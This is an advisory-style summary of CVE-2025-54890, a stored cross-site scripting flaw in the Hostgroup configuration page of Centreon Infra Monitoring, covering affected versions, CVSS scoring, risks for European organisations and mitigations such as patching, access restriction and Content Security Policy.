CVE-2025-54890 is a stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, affecting the Centreon Infra Monitoring product specifically on the Hostgroup configuration page. This vulnerability arises due to improper neutralization of input during web page generation, allowing malicious scripts submitted by users with elevated privileges to be stored and later executed in the browsers of other users who access the affected page. The affected versions include 23.10.0 before 23.10.29, 24.04.0 before 24.04.19, and 24.10.0 before 24.10.15. The vulnerability requires an attacker to have elevated privileges (e.g., admin or configuration rights) to inject the malicious payload, but does not require any user interaction to trigger the script execution once stored. The CVSS v3.1 score of 6.8 reflects a medium severity, with a network attack vector (AV:N), low attack complexity (AC:L), and privileges required (PR:H). The scope is changed (S:C), indicating that the vulnerability affects resources beyond the initially vulnerable component. The impact is high on confidentiality (C:H) but none on integrity (I:N) or availability (A:N). This means attackers can potentially steal sensitive information such as session cookies or credentials from other users but cannot modify data or disrupt service availability. No public exploits have been reported yet, but the vulnerability poses a risk especially in environments where multiple administrators or users with elevated privileges access the monitoring system. Centreon Infra Monitoring is widely used in enterprise IT infrastructure monitoring, making this vulnerability relevant for organizations relying on it for operational visibility and alerting.

For European organizations, this vulnerability could lead to unauthorized disclosure of sensitive information, including session tokens or administrative credentials, through the exploitation of stored XSS. This can facilitate further attacks such as privilege escalation, unauthorized access, or lateral movement within the network. Since Centreon Infra Monitoring is often deployed in critical infrastructure and enterprise environments, exploitation could compromise monitoring data confidentiality, potentially undermining operational security and incident response capabilities. The requirement for elevated privileges limits the attack surface but insider threats or compromised privileged accounts could be leveraged by attackers. The vulnerability does not impact system integrity or availability directly, so it is less likely to cause service disruption but can still have significant security implications. European organizations with regulatory requirements around data protection (e.g., GDPR) must consider the confidentiality risks and ensure timely remediation to avoid compliance issues.

The primary mitigation is to apply the vendor-released patches for Centreon Infra Monitoring versions 23.10.29, 24.04.19, and 24.10.15 or later, which address this stored XSS vulnerability. Until patches are applied, organizations should restrict elevated user access to trusted personnel only and enforce strict access controls and monitoring of administrative activities. Input validation and output encoding should be reviewed and enhanced in custom configurations or integrations to reduce XSS risks. Implement Content Security Policy (CSP) headers to limit the impact of potential script injection. Regularly audit user privileges and remove unnecessary elevated rights. Additionally, monitor logs for suspicious activity related to the Hostgroup configuration page and educate administrators about the risks of injecting untrusted content. Employ web application firewalls (WAF) with rules targeting XSS payloads as an interim protective measure. Finally, maintain an incident response plan to quickly address any suspected exploitation.